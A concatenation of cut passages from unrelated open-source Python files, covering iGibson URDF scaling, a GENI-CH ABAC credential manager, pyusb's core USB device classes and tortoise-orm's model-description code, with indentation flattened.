inertia.attrib["ixy"] = str(0.0)
inertia.attrib["ixz"] = str(0.0)
inertia.attrib["iyy"] = str(0.0)
inertia.attrib["iyz"] = str(0.0)
inertia.attrib["izz"] = str(0.0)
scale_in_lf = scales_in_lf[link.attrib["name"]]
# Apply the scale to all mesh elements within the link (original scale and origin)
for mesh in link.iter("mesh"):
if "scale" in mesh.attrib:
mesh_scale = np.array([float(val) for val in mesh.attrib["scale"].split(" ")])
new_scale = np.multiply(mesh_scale, scale_in_lf)
new_scale = np.array([round_up(val, 4) for val in new_scale])
mesh.attrib["scale"] = " ".join(map(str, new_scale))
else:
new_scale = np.array([round_up(val, 4) for val in scale_in_lf])
mesh.set("scale", " ".join(map(str, new_scale)))
for origin in link.iter("origin"):
origin_xyz = np.array([float(val) for val in origin.attrib["xyz"].split(" ")])
new_origin_xyz = np.multiply(origin_xyz, scale_in_lf)
new_origin_xyz = np.array([round_up(val, 4) for val in new_origin_xyz])
origin.attrib["xyz"] = " ".join(map(str, new_origin_xyz))
new_filename = filename[:-5] + "_avg_size"
urdfs_no_floating = save_urdfs_without_floating_joints(object_tree, new_filename, False)
# If the object is broken down to multiple URDF files, we only want to
# visulize the main URDF (e.g. visusalize the bed and ignore the pillows)
# The main URDF is the one with the highest mass.
max_mass = 0.0
main_urdf_file = None
for key in urdfs_no_floating:
object_tree = ET.parse(urdfs_no_floating[key][0])
cur_mass = 0.0
for mass in object_tree.iter("mass"):
cur_mass += float(mass.attrib["value"])
if cur_mass > max_mass:
max_mass = cur_mass
main_urdf_file = urdfs_no_floating[key][0]
assert main_urdf_file is not None
# Finally, we need to know where is the base_link origin wrt. the bounding box center. That allows us to place the model
# correctly since the joint transformations given in the scene urdf are for the bounding box center
# Coordinates of the bounding box center in the base_link frame
# We scale the location. We will subtract this to the joint location
scaled_bbxc_in_blf = -scale * base_link_offset
return main_urdf_file, scaled_bbxc_in_blf
def get_avg_size_mass():
avg_obj_dims_json = os.path.join(igibson.ig_dataset_path, "objects/avg_category_specs.json")
with open(avg_obj_dims_json) as f:
avg_obj_dims = json.load(f)
return avg_obj_dims
# return {
# 'lamp': {'size': [0.3, 0.4, 0.6], 'mass': 4, 'density': 4 / (0.3 * 0.3 * 1.0)},
# 'chair': {'size': [0.5, 0.5, 0.85], 'mass': 6, 'density': 6 / (0.5 * 0.5 * 0.85)},
# 'bed': {'size': [1.7, 2.2, 0.63], 'mass': 80, 'density': 80 / (1.7 * 2.2 * 0.63)},
# 'cushion': {'size': [0.4, 0.4, 0.25], 'mass': 1.3, 'density': 1.3 / (0.4 * 0.4 * 0.25)},
# 'piano': {'size': [1.16, 0.415, 1.0], 'mass': 225.0, 'density': 225.0 / (0.415 * 1.16 * 1.0)}
# }
def save_scale_urdfs():
main_urdf_file_and_offset = {}
avg_size_mass = get_avg_size_mass()
# all_materials = set()
root_dir = "/cvgl2/u/chengshu/ig_dataset_v5/objects"
for obj_class_dir in os.listdir(root_dir):
obj_class = obj_class_dir
# if obj_class not in SELECTED_CLASSES:
# continue
obj_class_dir = os.path.join(root_dir, obj_class_dir)
for obj_inst_dir in os.listdir(obj_class_dir):
obj_inst_name = obj_inst_dir
if obj_inst_name not in SELECTED_INSTANCES:
continue
urdf_path = obj_inst_name + ".urdf"
obj_inst_dir = os.path.join(obj_class_dir, obj_inst_dir)
urdf_path = os.path.join(obj_inst_dir, urdf_path)
main_urdf_file, scaled_bbxc_in_blf = save_scaled_urdf(urdf_path, avg_size_mass[obj_class], obj_class)
main_urdf_file_and_offset[obj_inst_dir] = (main_urdf_file, scaled_bbxc_in_blf)
print(main_urdf_file)
return main_urdf_file_and_offset
def render_physics_gifs(main_urdf_file_and_offset):
step_per_sec = 100
s = Simulator(mode="headless", image_width=512, image_height=512, physics_timestep=1 / float(step_per_sec))
root_dir = "/cvgl2/u/chengshu/ig_dataset_v5/objects"
obj_count = 0
for i, obj_class_dir in enumerate(sorted(os.listdir(root_dir))):
obj_class = obj_class_dir
# if obj_class not in SELECTED_CLASSES:
# continue
obj_class_dir = os.path.join(root_dir, obj_class_dir)
for obj_inst_dir in os.listdir(obj_class_dir):
# if obj_inst_dir != '14402':
# continue
imgs = []
scene = EmptyScene()
s.import_scene(scene, render_floor_plane=True)
obj_inst_name = | |
<reponame>hussamnasir/geni-ch
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
# Class to manage a set of ABAC credentials, certificates and prove queries
from ConfigParser import ConfigParser
import datetime
import optparse
import os
import subprocess
import sys
import tempfile
from chapi_log import *
from credential_tools import generate_credential
import xml.dom.minidom as minidom
from ABACKeyId import compute_keyid_from_cert_file, compute_keyid_from_cert
# Generate an ABACManager config file
# [Principals]
# name=certfile
# ...
# [Keys]
# name=keyfile
#
# Return name of config file and any tempfiles created in this process
def create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, \
raw_assertions):
tempfiles = []
# Format
# [Principals]
# The principals ("ME" and any in ID dictionary)
# [Keys]
# The keys ("ME")
# [AssertionFiles]
(fd, config_filename) = tempfile.mkstemp()
tempfiles.append(config_filename)
os.close(fd)
file = open(config_filename, 'w')
file.write('[Principals]\n')
for id_name, id_cert_file in id_cert_files.items():
file.write('%s=%s\n' % (id_name, id_cert_file))
for id_name, id_cert in id_certs.items():
(id_fd, id_filename) = tempfile.mkstemp()
tempfiles.append(id_filename)
os.close(id_fd)
id_file = open(id_filename, 'w')
id_file.write(id_cert)
id_file.close()
file.write('%s=%s\n' % (id_name, id_filename))
file.write('[Keys]\n')
for id_key_name, id_key_file in id_key_files.items():
file.write('%s=%s\n' % (id_key_name, id_key_file))
file.write('[AssertionFiles]\n')
for raw_assertion in raw_assertions:
(raw_fd, raw_filename) = tempfile.mkstemp()
tempfiles.append(raw_filename)
os.close(raw_fd)
raw_file = open(raw_filename, 'w')
raw_file.write(raw_assertion)
raw_file.close()
file.write('%s=None\n' % raw_filename)
file.close()
return config_filename, tempfiles
# Run a subprocess and grab and return contents of standard output
def grab_output_from_subprocess(args, include_stderr=False):
if include_stderr:
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
result = ''
chunk = proc.stdout.read()
while chunk:
result = result + chunk
chunk = proc.stdout.read()
return result
# Evaluate a query for given ID definitions and raw XML assertions
def execute_abac_query(query_expr, id_certs, raw_assertions = []):
abac_manager = ABACManager(certs_by_name=id_certs, raw_assertions=raw_assertions)
return abac_manager.query(query_expr)
# Get the key_id from a raw cert
def get_keyid_from_cert(cert, cert_file):
return compute_keyid_from_cert(cert, cert_file)
# Get the key_id from a cert_file
def get_keyid_from_certfile(cert_file):
return compute_keyid_from_cert_file(cert_file)
ABAC_TEMPLATE = "/usr/share/geni-chapi/abac_credential.xml"
# Generate an ABAC credential of a given assertion signed by "ME"
# with a set of id_certs (a dictionary of {name : cert}
def generate_abac_credential(assertion, me_cert, me_key,
id_certs = {}, id_cert_files = {}):
template = open(ABAC_TEMPLATE).read()
abac_manager = ABACManager(certs_by_name=id_certs, cert_files_by_name=id_cert_files)
assertion_split = assertion.split('<-')
subject_split = assertion_split[0].split('.')
subject_name = subject_split[0]
subject_role = subject_split[1]
subject_keyid = abac_manager._ids_by_name[subject_name]
target_split = assertion_split[1].split('.')
target_name = target_split[0]
target_keyid = abac_manager._ids_by_name[target_name]
target_role = ''
if len(target_split) > 1:
target_role = "<role>%s</role>" % target_split[1]
expires = datetime.datetime.utcnow() + datetime.timedelta(0, ABACManager.ten_years)
abac_mapping = {
'@expires@' : expires.isoformat(),
'@subject_keyid@' : subject_keyid,
'@subject_role@' : subject_role,
'@target_keyid@' : target_keyid,
'@target_role@' : target_role
}
signer_keyid = get_keyid_from_certfile(me_cert)
if (signer_keyid != subject_keyid):
print "Cannot create an ABAC credential where the subject is not the signer"
sys.exit(0)
return generate_credential(template, abac_mapping, me_cert, me_key)
# Assertions are a list of RT0 statements
# X.Y<-Z
# X.Y<-Z.W
# or RT1_lite statements (translated into RT0)
# X.Y(S)<-Z(T)
# X.Y(S)<-Z.W(T)
class ABACManager:
# Constants
ten_years = 10*365*24*3600
# Constructor
# Optional arguments:
# certs_by_name : A dictionary of principal_name => cert
# cert_files_by_name : A dictionary of principal_name => cert_filename
# key_files_by_name: A dictionary of principal_name => private_key_filename
# assertions : A list of assertions as ABAC statements (X.Y<-Z e.g.)
# raw_assertions : A list of signed XML versions of ABAC statements
# assertion_files : A list of files contianing signed XML versions of ABAC statements
# options : List of command-line provided optional values
def __init__(self, certs_by_name={}, cert_files_by_name={}, \
key_files_by_name={}, \
assertions=[], raw_assertions=[], assertion_files=[], \
options=None):
# For verbose debug output
self._verbose = False
# List of all ABAC principals (IDs) by name
self._ids_by_name = {}
# List of all files created from dumping certs or raw assertions
self._created_filenames = []
# All certs provided as raw cert objects
self._certs = []
# All cert files indexed by principal name
self._cert_files = {}
# All key files indexed by principal name
self._key_files ={}
# All raw assertions (as ABAC expressions)
self._assertions = []
# All assertion files
self._assertion_files = []
# Support internal prover
# Maintain all assertions and links
self._all_assertions = []
self._all_links = {} # ABAC links : where can I get to from X (All Y st. Y<-X)
# Process all the cert files
for principal_name in cert_files_by_name.keys():
cert_file = cert_files_by_name[principal_name]
principal = self.register_id(principal_name, cert_file)
# Process all the raw certs
for principal_name in certs_by_name.keys():
cert = certs_by_name[principal_name]
cert_file = self._dump_to_file(cert)
principal = self.register_id_for_cert(principal_name, cert, cert_file)
# Process the private keys
for principal_name in key_files_by_name.keys():
key_file = key_files_by_name[principal_name]
self.register_key(principal_name, key_file)
# Process all assertions
for assertion in assertions:
self.register_assertion(assertion)
# Process all raw_assertions
for raw_assertion in raw_assertions:
raw_assertion_file = self._dump_to_file(raw_assertion)
# print "Loading raw assertion file " + raw_assertion_file
self.register_assertion_file(raw_assertion_file)
# Process all assertion files
for assertion_file in assertion_files:
self.register_assertion_file(assertion_file)
# Save command-line options
self._options = options
# And process if provided
if self._options:
self.init_from_options()
def init_from_options(self):
# If a config file is provided, read it into the ABACManager
if self._options.config:
cp = ConfigParser()
cp.optionxform=str
cp.read(self._options.config)
for name in cp.options('Principals'):
cert_file = cp.get('Principals', name)
self.register_id(name, cert_file)
for name in cp.options('Keys'):
key_file = cp.get('Keys', name)
self.register_key(name, key_file)
if 'Assertions' in cp.sections():
for assertion in cp.options('Assertions'):
self.register_assertion(assertion)
if 'AssertionFiles' in cp.sections():
for assertion_file in cp.options("AssertionFiles"):
self.register_assertion_file(assertion_file)
# Use all the other command-line options to override/augment
# the values in the ABCManager
# Add new principal ID's / keys
if self._options.id:
for id_filename in self._options.id:
parts = id_filename.split(':')
id_name = parts[0].strip()
id_cert_file = None
if len(parts) > 1:
id_cert_file = parts[1].strip()
self.register_id(id_name, id_cert_file)
id_key_file = None
if len(parts) > 2:
id_key_file = parts[2].strip()
self.register_key(name, id_key_file)
# Register assertion files provided by command line
if self._options.assertion_file:
for assertion_file in self._options.assertion_file:
self.register_assertion_file(assertion_file)
# Grab pure ABAC assertions from commandline
if self._options.assertion:
for assertion in self._options.assertion:
self.register_assertion(assertion)
# Run command-line request for manager,
# either querying or creating/writing an assertion credential
def run(self):
if self._options.query:
ok, proof = self.query(self._options.query)
if ok:
print "Succeeded"
print "\n".join(self.pretty_print_proof(proof))
else:
print "Failed"
else:
if not self._options.credential \
or not self._options.signer_cert \
or not self._options.signer_key:
print "Missing signer_cert or signer_key argument for creating credential"
else:
cred = generate_abac_credential(self._options.credential,
self._options.signer_cert,
self._options.signer_key,
id_cert_files = self._cert_files)
if self._options.outfile:
f = open(self._options.outfile, 'w')
f.write(cred)
f.close()
else:
print cred
# Traverse tree of ABAC expression finding path leading from 'from_expr' to 'to_expr'
def find_path(self, from_expr, to_expr):
if from_expr not in self._all_links:
return False, None
if to_expr in self._all_links[from_expr]:
direct_link = "%s<-%s" % (to_expr, from_expr)
return True, [direct_link]
for link in self._all_links[from_expr]:
found_sub_path, sub_proof = self.find_path(link, to_expr)
if found_sub_path:
direct_link = "%s<-%s" % (link, from_expr)
return True, [direct_link] + sub_proof
return False, None
# Does given target have given role?
# I.e. can we prove query statement Q (X.role<-target)
# Return ok, proof
def query(self, query_expression):
# You gotta parse the expressions and go head-to-tail...
parts = query_expression.split('<-')
lhs = parts[0]
# If we have a parameterized query e.g. A.B(C)<D, replace with A.B_C<-D
if ')' in lhs and ')' in lhs:
lhs = lhs.replace('(', '_')
lhs = lhs.replace(')', '')
rhs = parts[1]
response, proof = self.find_path(rhs, lhs)
return response, proof
# Delete all the tempfiles create
def __del__(self):
for created_filename in self._created_filenames:
os.remove(created_filename)
# Register a new ID with the manager
def register_id(self, name, cert_file):
id = get_keyid_from_certfile(cert_file)
self._ids_by_name[name] = id
self._cert_files[name] = cert_file
# Register a new ID with the manager for a raw_cert and cert_file
| |
<gh_stars>1-10
# Copyright (C) 2009-2014 <NAME>
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""usb.core - Core USB features.
This module exports:
Device - a class representing a USB device.
Configuration - a class representing a configuration descriptor.
Interface - a class representing an interface descriptor.
Endpoint - a class representing an endpoint descriptor.
find() - a function to find USB devices.
show_devices() - a function to show the devices present.
"""
__author__ = '<NAME>'
__all__ = [ 'Device', 'Configuration', 'Interface', 'Endpoint', 'find',
'show_devices' ]
import usb.util as util
import copy
import operator
import usb._interop as _interop
import usb._objfinalizer as _objfinalizer
import usb._lookup as _lu
import logging
import array
import threading
import functools
_logger = logging.getLogger('usb.core')
_DEFAULT_TIMEOUT = 1000
def _set_attr(input, output, fields):
for f in fields:
setattr(output, f, getattr(input, f))
def _try_get_string(dev, index, langid = None, default_str_i0 = "",
default_access_error = "Error Accessing String"):
""" try to get a string, but return a string no matter what
"""
if index == 0 :
string = default_str_i0
else:
try:
if langid is None:
string = util.get_string(dev, index)
else:
string = util.get_string(dev, index, langid)
except :
string = default_access_error
return string
def _try_lookup(table, value, default = ""):
""" try to get a string from the lookup table, return "" instead of key
error
"""
try:
string = table[ value ]
except KeyError:
string = default
return string
class _DescriptorInfo(str):
""" this class is used so that when a descriptor is shown on the
terminal it is propely formatted """
def __repr__(self):
return self
def synchronized(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
try:
self.lock.acquire()
return f(self, *args, **kwargs)
finally:
self.lock.release()
return wrapper
class _ResourceManager(object):
def __init__(self, dev, backend):
self.backend = backend
self._active_cfg_index = None
self.dev = dev
self.handle = None
self._claimed_intf = _interop._set()
self._ep_info = {}
self.lock = threading.RLock()
@synchronized
def managed_open(self):
if self.handle is None:
self.handle = self.backend.open_device(self.dev)
return self.handle
@synchronized
def managed_close(self):
if self.handle is not None:
self.backend.close_device(self.handle)
self.handle = None
@synchronized
def managed_set_configuration(self, device, config):
if config is None:
cfg = device[0]
elif isinstance(config, Configuration):
cfg = config
elif config == 0: # unconfigured state
class MockConfiguration(object):
def __init__(self):
self.index = None
self.bConfigurationValue = 0
cfg = MockConfiguration()
else:
cfg = util.find_descriptor(device, bConfigurationValue=config)
if cfg is None:
raise ValueError("Invalid configuration " + str(config))
self.managed_open()
self.backend.set_configuration(self.handle, cfg.bConfigurationValue)
# cache the index instead of the object to avoid cyclic references
# of the device and Configuration (Device tracks the _ResourceManager,
# which tracks the Configuration, which tracks the Device)
self._active_cfg_index = cfg.index
self._ep_info.clear()
@synchronized
def managed_claim_interface(self, device, intf):
self.managed_open()
if isinstance(intf, Interface):
i = intf.bInterfaceNumber
else:
i = intf
if i not in self._claimed_intf:
self.backend.claim_interface(self.handle, i)
self._claimed_intf.add(i)
@synchronized
def managed_release_interface(self, device, intf):
if intf is None:
cfg = self.get_active_configuration(device)
i = cfg[(0,0)].bInterfaceNumber
elif isinstance(intf, Interface):
i = intf.bInterfaceNumber
else:
i = intf
if i in self._claimed_intf:
try:
self.backend.release_interface(self.handle, i)
finally:
self._claimed_intf.remove(i)
@synchronized
def managed_set_interface(self, device, intf, alt):
if isinstance(intf, Interface):
i = intf
else:
cfg = self.get_active_configuration(device)
if intf is None:
intf = cfg[(0,0)].bInterfaceNumber
if alt is not None:
i = util.find_descriptor(cfg, bInterfaceNumber=intf, bAlternateSetting=alt)
else:
i = util.find_descriptor(cfg, bInterfaceNumber=intf)
self.managed_claim_interface(device, i)
if alt is None:
alt = i.bAlternateSetting
self.backend.set_interface_altsetting(self.handle, i.bInterfaceNumber, alt)
@synchronized
def setup_request(self, device, endpoint):
# we need the endpoint address, but the "endpoint" parameter
# can be either the a Endpoint object or the endpoint address itself
if isinstance(endpoint, Endpoint):
endpoint_address = endpoint.bEndpointAddress
else:
endpoint_address = endpoint
intf, ep = self.get_interface_and_endpoint(device, endpoint_address)
self.managed_claim_interface(device, intf)
return (intf, ep)
# Find the interface and endpoint objects which endpoint address belongs to
@synchronized
def get_interface_and_endpoint(self, device, endpoint_address):
try:
return self._ep_info[endpoint_address]
except KeyError:
for intf in self.get_active_configuration(device):
ep = util.find_descriptor(intf, bEndpointAddress=endpoint_address)
if ep is not None:
self._ep_info[endpoint_address] = (intf, ep)
return intf, ep
raise ValueError('Invalid endpoint address ' + hex(endpoint_address))
@synchronized
def get_active_configuration(self, device):
if self._active_cfg_index is None:
self.managed_open()
cfg = util.find_descriptor(
device,
bConfigurationValue=self.backend.get_configuration(self.handle)
)
if cfg is None:
raise USBError('Configuration not set')
self._active_cfg_index = cfg.index
return cfg
return device[self._active_cfg_index]
@synchronized
def release_all_interfaces(self, device):
claimed = copy.copy(self._claimed_intf)
for i in claimed:
try:
self.managed_release_interface(device, i)
except USBError:
# Ignore errors when releasing the interfaces
# When the device is disconnected, the call may fail
pass
@synchronized
def dispose(self, device, close_handle = True):
self.release_all_interfaces(device)
if close_handle:
self.managed_close()
self._ep_info.clear()
self._active_cfg_index = None
class USBError(IOError):
r"""Exception class for USB errors.
Backends must raise this exception when USB related errors occur. The
backend specific error code is available through the 'backend_error_code'
member variable.
"""
def __init__(self, strerror, error_code = None, errno = None):
r"""Initialize the object.
This initializes the USBError object. The strerror and errno are passed
to the parent object. The error_code parameter is attributed to the
backend_error_code member variable.
"""
IOError.__init__(self, errno, strerror)
self.backend_error_code = error_code
class NoBackendError(ValueError):
r"Exception class when a valid backend is not found."
pass
class Endpoint(object):
r"""Represent an endpoint object.
This class contains all fields of the Endpoint Descriptor according to the
USB Specification. You can access them as class properties. For example, to
access the field bEndpointAddress of the endpoint descriptor, you can do so:
>>> import usb.core
>>> dev = usb.core.find()
>>> for cfg in dev:
>>> for i in cfg:
>>> for e in i:
>>> print e.bEndpointAddress
"""
def __init__(self, device, endpoint, interface = 0,
alternate_setting = 0, configuration = 0):
r"""Initialize the Endpoint object.
The device parameter is the device object returned by the find()
function. endpoint is the endpoint logical index (not the endpoint
address). The configuration parameter is the logical index of the
configuration (not the bConfigurationValue field). The interface
parameter is the interface logical index (not the bInterfaceNumber
field) and alternate_setting is the alternate setting logical index
(not the bAlternateSetting value). An interface may have only one
alternate setting. In this case, the alternate_setting parameter
should be zero. By "logical index" we mean the relative order of the
configurations returned by the peripheral as a result of GET_DESCRIPTOR
request.
"""
self.device = device
self.index = endpoint
backend = device._ctx.backend
desc = backend.get_endpoint_descriptor(
device._ctx.dev,
endpoint,
interface,
alternate_setting,
configuration
)
_set_attr(
desc,
self,
(
'bLength',
'bDescriptorType',
'bEndpointAddress',
'bmAttributes',
'wMaxPacketSize',
'bInterval',
'bRefresh',
'bSynchAddress',
'extra_descriptors'
)
)
def __repr__(self):
return "<" + self._str() + ">"
def __str__(self):
headstr = " " + self._str() + " "
if util.endpoint_direction(self.bEndpointAddress) == util.ENDPOINT_IN:
direction = "IN"
else:
direction = "OUT"
return "%s%s\n" % (headstr, "=" * (60 - len(headstr))) + \
" %-17s:%#7x (7 bytes)\n" % (
"bLength", self.bLength) + \
" %-17s:%#7x %s\n" % (
"bDescriptorType", self.bDescriptorType,
_try_lookup(_lu.descriptors, self.bDescriptorType)) + \
" %-17s:%#7x %s\n" % (
"bEndpointAddress", self.bEndpointAddress, direction) + \
" %-17s:%#7x %s\n" % (
"bmAttributes", self.bmAttributes,
_lu.ep_attributes[(self.bmAttributes & 0x3)]) + \
" %-17s:%#7x (%d bytes)\n" % (
"wMaxPacketSize", self.wMaxPacketSize, self.wMaxPacketSize) + \
" %-17s:%#7x" % ("bInterval", self.bInterval)
def write(self, data, timeout = None):
r"""Write data to the endpoint.
The parameter data contains the | |
import asyncio
import importlib
import json
import logging
import os
import warnings
from copy import deepcopy
from inspect import isclass
from typing import Any, Coroutine, Dict, List, Optional, Tuple, Type, Union, cast
from pypika import Table
from tortoise.backends.base.client import BaseDBAsyncClient
from tortoise.backends.base.config_generator import expand_db_url, generate_config
from tortoise.exceptions import ConfigurationError
from tortoise.fields.relational import (
BackwardFKRelation,
BackwardOneToOneRelation,
ForeignKeyFieldInstance,
ManyToManyFieldInstance,
OneToOneFieldInstance,
)
from tortoise.filters import get_m2m_filters
from tortoise.models import Model
from tortoise.queryset import QuerySet
from tortoise.transactions import current_transaction_map
from tortoise.utils import generate_schema_for_client
try:
from contextvars import ContextVar
except ImportError: # pragma: nocoverage
from aiocontextvars import ContextVar # type: ignore
logger = logging.getLogger("tortoise")
class Tortoise:
apps: Dict[str, Dict[str, Type[Model]]] = {}
_connections: Dict[str, BaseDBAsyncClient] = {}
_inited: bool = False
@classmethod
def get_connection(cls, connection_name: str) -> BaseDBAsyncClient:
"""
Returns the connection by name.
:raises KeyError: If connection name does not exist.
"""
return cls._connections[connection_name]
@classmethod
def describe_model(cls, model: Type[Model], serializable: bool = True) -> dict:
"""
Describes the given list of models or ALL registered models.
:param model:
The Model to describe
:param serializable:
``False`` if you want raw python objects,
``True`` for JSON-serialisable data. (Defaults to ``True``)
:return:
A dictionary containing the model description.
The base dict has a fixed set of keys that reference a list of fields
(or a single field in the case of the primary key):
.. code-block:: python3
{
"name": str # Qualified model name
"app": str # 'App' namespace
"table": str # DB table name
"abstract": bool # Is the model Abstract?
"description": str # Description of table (nullable)
"unique_together": [...] # List of List containing field names that
# are unique together
"pk_field": {...} # Primary key field
"data_fields": [...] # Data fields
"fk_fields": [...] # Foreign Key fields FROM this model
"backward_fk_fields": [...] # Foreign Key fields TO this model
"o2o_fields": [...] # OneToOne fields FROM this model
"backward_o2o_fields": [...] # OneToOne fields TO this model
"m2m_fields": [...] # Many-to-Many fields
}
Each field is specified as follows
(This assumes ``serializable=True``, which is the default):
.. code-block:: python3
{
"name": str # Field name
"field_type": str # Field type
"db_column": str # Name of DB column
# Optional: Only for pk/data fields
"raw_field": str # Name of raw field of the Foreign Key
# Optional: Only for Foreign Keys
"db_field_types": dict # DB Field types for default and DB overrides
"python_type": str # Python type
"generated": bool # Is the field generated by the DB?
"nullable": bool # Is the column nullable?
"unique": bool # Is the field unique?
"indexed": bool # Is the field indexed?
"default": ... # The default value (coerced to int/float/str/bool/null)
"description": str # Description of the field (nullable)
}
When ``serializable=False`` is specified some fields are not coerced to valid
JSON types. The changes are:
.. code-block:: python3
{
"field_type": Field # The Field class used
"python_type": Type # The actual Python type
"default": ... # The default value as native type OR a callable
}
"""
def _type_name(typ) -> str:
if typ.__module__ == "builtins":
return typ.__name__
return f"{typ.__module__}.{typ.__name__}"
def model_name(typ: Type[Model]) -> str:
name = typ._meta.table
for app in cls.apps.values(): # pragma: nobranch
for _name, _model in app.items(): # pragma: nobranch
if typ == _model:
name = _name
return f"{typ._meta.app}.{name}"
def type_name(typ: Any) -> Union[str, List[str]]:
try:
if issubclass(typ, Model):
return model_name(typ)
except TypeError:
pass
try:
return _type_name(typ)
except AttributeError:
return [_type_name(_typ) for _typ in typ]
def default_name(default: Any) -> Optional[Union[int, float, str, bool]]:
if isinstance(default, (int, float, str, bool, type(None))):
return default
if callable(default):
return f"<function {default.__module__}.{default.__name__}>"
return str(default)
def describe_field(name: str) -> dict:
# TODO: db_type
field = model._meta.fields_map[name]
field_type = getattr(field, "model_class", field.field_type)
desc = {
"name": name,
"field_type": field.__class__.__name__ if serializable else field.__class__,
"db_column": field.source_field or name,
"raw_field": None,
"db_field_types": field.get_db_field_types(),
"python_type": type_name(field_type) if serializable else field_type,
"generated": field.generated,
"nullable": field.null,
"unique": field.unique,
"indexed": field.index or field.unique,
"default": default_name(field.default) if serializable else field.default,
"description": field.description,
}
# Delete db fields for non-db fields
if not desc["db_field_types"]:
del desc["db_field_types"]
# Foreign Keys have
if isinstance(field, (ForeignKeyFieldInstance, OneToOneFieldInstance)):
del desc["db_column"]
desc["raw_field"] = field.source_field
else:
del desc["raw_field"]
# These fields are entierly "virtual", so no direct DB representation
if isinstance(
field, (ManyToManyFieldInstance, BackwardFKRelation, BackwardOneToOneRelation,),
):
del desc["db_column"]
return desc
return {
"name": model_name(model),
"app": model._meta.app,
"table": model._meta.table,
"abstract": model._meta.abstract,
"description": model._meta.table_description or None,
"unique_together": model._meta.unique_together or [],
"pk_field": describe_field(model._meta.pk_attr),
"data_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name != model._meta.pk_attr
and name in (model._meta.fields - model._meta.fetch_fields)
],
"fk_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.fk_fields
],
"backward_fk_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.backward_fk_fields
],
"o2o_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.o2o_fields
],
"backward_o2o_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.backward_o2o_fields
],
"m2m_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.m2m_fields
],
}
@classmethod
def describe_models(
cls, models: Optional[List[Type[Model]]] = None, serializable: bool = True
) -> Dict[str, dict]:
"""
Describes the given list of models or ALL registered models.
:param models:
List of models to describe, if not provided then describes ALL registered models
:param serializable:
``False`` if you want raw python objects,
``True`` for JSON-serialisable data. (Defaults to ``True``)
:return:
A dictionary containing the model qualifier as key,
and the same output as ``describe_model(...)`` as value:
.. code-block:: python3
{
"models.User": {...},
"models.Permission": {...}
}
"""
if not models:
models = []
for app in cls.apps.values():
for model in app.values():
models.append(model)
return {
f"{model._meta.app}.{model.__name__}": cls.describe_model(model, serializable)
for model in models
}
@classmethod
def _init_relations(cls) -> None:
def get_related_model(related_app_name: str, related_model_name: str):
"""
Test, if app and model really exist. Throws a ConfigurationError with a hopefully
helpful message. If successfull, returns the requested model.
"""
try:
return cls.apps[related_app_name][related_model_name]
except KeyError:
if related_app_name not in cls.apps:
raise ConfigurationError(f"No app with name '{related_app_name}' registered.")
raise ConfigurationError(
f"No model with name '{related_model_name}' registered in"
f" app '{related_app_name}'."
)
def split_reference(reference: str) -> Tuple[str, str]:
"""
Test, if reference follow the official naming conventions. Throws a
ConfigurationError with a hopefully helpful message. If successfull,
returns the app and the model name.
"""
items = reference.split(".")
if len(items) != 2: # pragma: nocoverage
raise ConfigurationError(
(
"'%s' is not a valid model reference Bad Reference."
" Should be something like <appname>.<modelname>."
)
% reference
)
return (items[0], items[1])
for app_name, app in cls.apps.items():
for model_name, model in app.items():
if model._meta._inited:
continue
model._meta._inited = True
if not model._meta.table:
model._meta.table = model.__name__.lower()
pk_attr_changed = False
for field in model._meta.fk_fields:
fk_object = cast(ForeignKeyFieldInstance, model._meta.fields_map[field])
reference = fk_object.model_name
related_app_name, related_model_name = split_reference(reference)
